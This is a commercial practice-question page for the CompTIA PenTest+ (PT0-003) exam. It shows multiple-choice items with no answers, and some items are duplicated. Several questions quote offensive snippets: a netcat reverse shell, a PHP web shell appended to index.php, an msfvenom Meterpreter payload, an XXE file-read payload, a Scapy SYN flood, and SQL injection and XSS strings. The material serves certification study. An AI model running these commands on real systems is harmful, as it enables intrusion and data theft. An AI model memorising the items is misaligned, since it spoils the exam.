Summer Certification Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

PT0-003 CompTIA PenTest+ Exam Questions and Answers

Questions 4

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?

Options:

A.

Read-only

B.

Domain administrator

C.

Local user

D.

Root

Buy Now
Questions 5

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Buy Now
Questions 6

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Buy Now
Questions 7

A penetration tester attempts unauthorized entry to the company ' s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Buy Now
Questions 8

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester’s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Buy Now
Questions 9

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Buy Now
Questions 10

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

Options:

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Buy Now
Questions 11

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I ' X ' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I ' X ' dig X.mydomain.com

Buy Now
Questions 12

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

Options:

A.

On-path

B.

Logic bomb

C.

Rootkit

D.

Buffer overflow

Buy Now
Questions 13

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Options:

A.

nmap -Pn -A 10.10.10.10

B.

nmap -sV 10.10.10.10

C.

nmap -Pn -w 10.10.10.10

D.

nmap -sV -Pn -p- 10.10.10.10

Buy Now
Questions 14

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Options:

A.

Rubeus

B.

WinPEAS

C.

NTLMRelayX

D.

Impacket

Buy Now
Questions 15

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester ' s machine. Which of the following commands should the tester use to do this task from the tester ' s host?

Options:

A.

attacker_host$ nmap -sT < target_cidr > | nc -n < compromised_host > 22

B.

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 < backpipe | nc < target_cidr > 80 | tee backpipe

C.

attacker_host$ nc -nlp 8000 | nc -n < target_cidr > attacker_host$ nmap -sT 127.0.0.1 8000

D.

attacker_host$ proxychains nmap -sT < target_cidr >

Buy Now
Questions 16

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday

B.

Download all TGS tickets for offline processing

C.

Perform a pass-the-hash attack using the hash for aholliday

D.

Perform password spraying

Buy Now
Questions 17

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

Options:

A.

Lock picking

B.

Impersonating

C.

Jamming

D.

Tailgating

E.

Bypassing

Buy Now
Questions 18

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Buy Now
Questions 19

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Buy Now
Questions 20

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 21

During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser " hacker " -NewPassword " Password123! " -DriverName " Print "

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?

Options:

A.

Log off and log on with " hacker " .

B.

Attempt to add another user.

C.

Bypass the execution policy.

D.

Add a malicious printer driver.

Buy Now
Questions 22

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Options:

A.

Service discovery

B.

OS fingerprinting

C.

Host discovery

D.

DNS enumeration

Buy Now
Questions 23

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scraping

D.

DoS attack

Buy Now
Questions 24

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered

B.

The wrong subnet was scanned

C.

Windows is using WSL

D.

IPS is blocking the ports

Buy Now
Questions 25

A penetration tester modifies a web application’s URL by inserting malformed data into input parameters. The web application returns the error message below:

Internal Server Error

NumberFormatException: For input string ...

Source file: /home/www/htmldoc/app001/140612/main

Which of the following actions will the tester most likely take?

Options:

A.

Perform application dynamic testing.

B.

Tamper with the application’s log files.

C.

Force a remote memory overflow.

D.

Exploit SQL injection vulnerabilities.

Buy Now
Questions 26

A penetration tester reviews a SAST vulnerability scan report. The following lines of code have been reported as vulnerable:

Issue 40 of 126

Language: Java

Severity: Medium

Call:

try {

// ...

} catch (SomeException e) {

e.printStackTrace();

}

Which of the following is the best method to remediate this vulnerability?

Options:

A.

Implementing a logging framework

B.

Removing the five code lines reported with issues

C.

Initiating a secure coding-awareness program with all the developers

D.

Documenting the vulnerability as a false positive

Buy Now
Questions 27

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 28

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?

Options:

A.

Remove configuration changes and any tools deployed to compromised systems.

B.

Securely destroy or remove all engagement-related data from testing systems.

C.

Search through configuration files changed for sensitive credentials and remove them.

D.

Shut down C2 and attacker infrastructure on premises and in the cloud.

Buy Now
Questions 29

A penetration tester writes the following script to enumerate a /24 network:

1 #!/bin/bash

2 for i in {1..254}

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token ' ping '

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2

B.

Replace {1..254} with $(seq 1 254)

C.

Replace bash with zsh

D.

Replace $i with ${i}

Buy Now
Questions 30

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Buy Now
Questions 31

A penetration tester is conducting an assessment of a web application ' s login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?

Options:

A.

XSS

B.

On-path attack

C.

SQL injection

D.

HTML scraping

Buy Now
Questions 32

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy

D.

Metasploit

Buy Now
Questions 33

A penetration tester is evaluating a company’s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? Select two.

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Buy Now
Questions 34

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Buy Now
Questions 35

Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done

B.

Keeping the report to a maximum of 5 to 10 pages in length

C.

Basing the recommendation on the risk score in the report

D.

Making the report clear for all objectives with a precise executive summary

Buy Now
Questions 36

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?

Options:

A.

Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

B.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.

C.

Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.

D.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

Buy Now
Questions 37

During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands. The penetration tester receives the following output:

-rw-r--r-- 1 comptiauser comptiauser 807 Apr 6 05:32 .profile

drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05:32 .ssh

-rw-r--r-- 1 comptiauser comptiauser 3526 Apr 6 05:32 .bashrc

drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11:05 .aws

-rw-r--r-- 1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history

drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents

drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop

drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads

Which of the following should the penetration tester investigate first?

Options:

A.

Documents

B.

.zsh_history

C.

.aws

D.

.ssh

Buy Now
Questions 38

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in —MISSING TEXT—

do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of the —MISSING TEXT— placeholder?

Options:

A.

crunch 1 254 loop

B.

seq 1 254

C.

echo 1-254

D.

{1.-254}

Buy Now
Questions 39

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?

Options:

A.

tcprelay

B.

Bluecrack

C.

Scapy

D.

tcpdump

Buy Now
Questions 40

A penetration tester reviews scan output showing open services including FTP, SSH, SMTP, DNS, Kerberos, LDAP, HTTPS, SMB, RDP, and Squid proxy. The output also shows NetBIOS and DNS domain information. Which of the following most likely describes the function of this system?

Options:

A.

Enterprise mail server

B.

Honeypot

C.

Stand-alone web server

D.

Domain Controller

Buy Now
Questions 41

A penetration tester gained a foothold within a network. The penetration tester needs to enumerate all users within the domain. Which of the following is the best way to accomplish this task?

Options:

A.

pwd.exe

B.

net.exe

C.

sc.exe

D.

msconfig.exe

Buy Now
Questions 42

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:

mathematica

Copy code

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Buy Now
Questions 43

During a web application assessment, a penetration tester accesses the site unauthenticated and receives the following Set-Cookie on the first response:

auth=yYKGORbrpabgr842ajbvrpbptau42342

When the tester logs in, the server sends only one Set-Cookie header, and the value is exactly the same as shown above. Which of the following vulnerabilities has the tester discovered?

Options:

A.

JWT manipulation

B.

Cookie poisoning

C.

Session fixation

D.

Collision attack

Buy Now
Questions 44

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Buy Now
Questions 45

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

Options:

A.

curl https://api.shodan.io/shodan/host/search?key= < API_KEY > & query=hostname: < target >

B.

proxychains nmap -sV -T2 < target >

C.

for i in < target > ; do curl -k $i; done

D.

nmap -sV -T2 < target >

Buy Now
Questions 46

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Options:

A.

Bluejacking

B.

SSID spoofing

C.

Packet sniffing

D.

ARP poisoning

Buy Now
Questions 47

A penetration tester wants to gather the names of potential phishing targets who have access to sensitive data. Which of the following would best meet this goal?

Options:

A.

WHOIS

B.

Censys.io

C.

SpiderFoot

D.

theHarvester

Buy Now
Questions 48

During an engagement, a penetration tester runs the following command against the host system:

host -t axfr domain.com dnsl.domain.com

Which of the following techniques best describes what the tester is doing?

Options:

A.

Zone transfer

B.

Host enumeration

C.

DNS poisoning

D.

DNS query

Buy Now
Questions 49

A penetration tester reviews a scan report and identifies a deserialization vulnerability. The vulnerability is due to the way a function from a Python library has been used in code. The scan does not consider input data being used in the function ' s serialization. Which of the following scan types most likely provided this finding?

Options:

A.

DAST

B.

SAST

C.

IAST

D.

SCA

Buy Now
Questions 50

Which of the following OT protocols sends information in cleartext?

Options:

A.

TTEthernet

B.

DNP3

C.

Modbus

D.

PROFINET

Buy Now
Questions 51

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?

Options:

A.

nc -lvp 8080

B.

nc -lnvp 443

C.

python3 -m http.server 80

D.

ncat -lvp 9090

Buy Now
Questions 52

A company hires a penetration tester to test the security implementation of its wireless networks. The main goal for this assessment is to intercept and get access to sensitive data from the company ' s employees. Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Buy Now
Questions 53

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?

Options:

A.

Deploy a command-and-control server with custom profiles to facilitate execution.

B.

Use Python 3 with added testing libraries and script the relevant action to test.

C.

Utilize the PowerShell PowerView tool with custom scripting additions based on test results.

D.

Implement Atomic Red Team to chain critical TTPs and perform the test.

Buy Now
Questions 54

While conducting a reconnaissance activity, a penetration tester extracts the following information:

Emails:

admin@acme.com

sales@acme.com

support@acme.com

Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?

Options:

A.

Unauthorized access to the network

B.

Exposure of sensitive servers to the internet

C.

Likelihood of SQL injection attacks

D.

Indication of a data breach in the company

Buy Now
Questions 55

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

xml

Copy code

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [

< !ENTITY foo SYSTEM " file:///etc/passwd " >

] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx.

B.

Ensure the requests application access logs are reviewed frequently.

C.

Disable the use of external entities.

D.

Implement a WAF to filter all incoming requests.

Buy Now
Questions 56

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information:

Server-side request forgery (SSRF) vulnerability in test.comptia.org

Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org

Publicly accessible storage system named static_comptia_assets

SSH port 22 open to the internet on test3.comptia.org

Open redirect vulnerability in test4.comptia.org

Which of the following attack paths should the tester prioritize first?

Options:

A.

Synchronize all the information from the public bucket and scan it with Trufflehog.

B.

Run Pacu to enumerate permissions and roles within the cloud-based systems.

C.

Perform a full dictionary brute-force attack against the open SSH service using Hydra.

D.

Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.

E.

Leverage the SSRF to gain access to credentials from the metadata service.

Buy Now
Questions 57

A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?

Options:

A.

DAST

B.

SAST

C.

IAST

D.

SCA

Buy Now
Questions 58

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

ip = IP( " 192.168.50.2 " )

tcp = TCP(sport=RandShort(), dport=80, flags= " S " )

raw = RAW(b " X " *1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

Options:

A.

MDK4

B.

Smurf attack

C.

FragAttack

D.

SYN flood

Buy Now
Questions 59

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

Which of the following steps should the tester take to complete the goal?

Options:

A.

Use Mimikatz to collect information about the accounts and try to authenticate in other systems

B.

Use Hashcat to crack a password for the local user on the compromised endpoint

C.

Use Evil-WinRM to access other systems in the network within the endpoint credentials

D.

Use Metasploit to create and execute a payload and try to upload the payload into other systems

Buy Now
Questions 60

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools > c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PSExec on the server01 using CMD.exe.

B.

Perform a lateral movement attack using PsExec.

C.

Send the PsExec binary file to the server01 using CMD.exe.

D.

Enable CMD.exe on the server01 through PsExec.

Buy Now
Questions 61

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

Options:

A.

Kiosk escape

B.

Arbitrary code execution

C.

Process hollowing

D.

Library injection

Buy Now
Questions 62

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/ < sCRitP > aLeRt( ' pwned ' ) < /ScriPt >

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options:

A.

Arbitrary code execution: the affected computer should be placed on a perimeter network

B.

SQL injection attack: should be detected and prevented by a web application firewall

C.

Cross-site request forgery: should be detected and prevented by a firewall

D.

XSS obfuscated: should be prevented by input sanitization

Buy Now
Questions 63

A company ' s incident response team determines that a breach occurred because a penetration tester left a web shell. Which of the following should the penetration tester have done after the engagement?

Options:

A.

Enable a host-based firewall on the machine

B.

Remove utilized persistence mechanisms on client systems

C.

Revert configuration changes made during the engagement

D.

Turn off command-and-control infrastructure

Buy Now
Questions 64

A penetration tester finds it is possible to downgrade a web application ' s HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Buy Now
Questions 65

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Buy Now
Questions 66

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

Weaker password settings than the company standard

Systems without the company ' s endpoint security software installed

Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Buy Now
Questions 67

A penetration tester gains access to a host with many applications that load at startup and run as SYSTEM. The penetration tester runs a command and receives the following output:

User accounts for \COMPTIA-Host

CompTIA User DefaultAccount Guest

CompTIA Admin CompTIA Accountant

The command completed successfully.

Which of the following attacks will most likely allow the penetration tester to escalate privileges?

Options:

A.

Credential dumping

B.

Local file inclusion

C.

Unquoted service path injection

D.

Process hijacking

Buy Now
Questions 68

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Buy Now
Questions 69

A penetration tester uses Burp Suite to send the following request:

POST /loginPage HTTP/1.1

Host: 10.10.100.1:443

User-Agent: Mozilla/5.0 (X11; Linux;)

Accept: application/json, text/javascript, *

Cookie: as=ausnHsdyh6aBda

Connection: Close

{ " user " : " admin " , " password " : " admin ' or ' " }

Which of the following options best describes what the tester is executing?

Options:

A.

SQL injection

B.

Session hijack

C.

Brute-force attack on usernames or/and password

D.

Cross-site scripting

Buy Now
Questions 70

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping

B.

Code repository scanning

C.

Directory enumeration

D.

Port scanning

Buy Now
Questions 71

During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network ' s authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?

Options:

A.

KARMA attack

B.

Beacon flooding

C.

MAC address spoofing

D.

Eavesdropping

Buy Now
Questions 72

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Buy Now
Questions 73

After a recent penetration test was conducted by the company ' s penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team ' s objective?

Options:

A.

To enumerate current users

B.

To determine the users ' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Buy Now
Questions 74

A penetration tester would like to collect permission details for objects within the domain. The tester has a valid AD user and access to an internal PC. Which of the following sets of steps is the best way for the tester to accomplish the desired outcome?

Options:

A.

Escalate privileges.Execute Rubeus.Run a Cypher query on Rubeus to get the results.

B.

Run SharpHound.Install CrackMapExec.Perform a CrackMapExec database query on CME to get the results.

C.

Run SharpHoundInstall BloodHoundPerform a Cypher query on BloodHound to get the results.

D.

Escalate privileges.Get Windows Registry data.Perform a query to get results.

Buy Now
Questions 75

During an engagement, a penetration tester decides to use social engineering to capture MFA. Which of the following tools or configuration commands should the tester use?

Options:

A.

Evilginx

B.

use phish/domains/o365set SOURCE portal.office.comrun

C.

wget portal.office.comexport MFA= ' < myphishdomain > '

D.

Recon-ng

Buy Now
Questions 76

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}

B.

%0a

C.

+ *

D.

%20

Buy Now
Questions 77

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

Options:

A.

Caldera

B.

SpiderFoot

C.

Maltego

D.

WIGLE.net

Buy Now
Questions 78

A penetration tester exports the following CSV data from a scanner. The tester wants to parse the data using Bash and input it into another tool.

CSV data before parsing:

cat data.csv

Host, IP, Username, Password

WINS212, 10.111.41.74, admin, Spring11

HRDB, 10.13.9.212, hradmin, HRForTheWin

WAS01, 192.168.23.13, admin, Snowfall97

Intended output:

admin Spring11

hradmin HRForTheWin

admin Snowfall97

Which of the following will provide the intended output?

Options:

A.

cat data.csv | grep -v " IP " | cut -d " , " -f 3,4 | sed -e ' s/,/ / '

B.

cat data.csv | find . -iname Username,Password

C.

cat data.csv | grep ' username|Password '

D.

cat data.csv | grep -i " admin " | grep -v " WINS212\|HRDB\|WAS01\|10.111.41.74\|10.13.9.212\|192.168.23.13 "

Buy Now
Questions 79

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Buy Now
Questions 80

A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:

echo ' < ?php system($_GET[ " c " ]); ? > ' > > /var/www/public/index.php

Which of the following best explains what the penetration tester is trying to do?

Options:

A.

Prevent detection.

B.

Circumvent controls.

C.

Move laterally.

D.

Establish persistence.

Buy Now
Questions 81

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Buy Now
Questions 82

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

Options:

A.

sqlmap -u www.example.com/?id=1 --search -T user

B.

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C.

sqlmap -u www.example.com/?id=1 --tables -D accounts

D.

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Buy Now
Questions 83

A penetration tester needs to confirm the version number of a client ' s web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Buy Now
Questions 84

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Buy Now
Questions 85

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Buy Now
Questions 86

A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

Which of the following best describes the tester ' s objective?

Options:

A.

To download data from an API endpoint

B.

To download data from a cloud storage

C.

To exfiltrate data over alternate data streams

D.

To exfiltrate data to cloud storage

Buy Now
Questions 87

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Buy Now
Questions 88

A penetration tester cannot complete a full vulnerability scan because the client ' s WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?

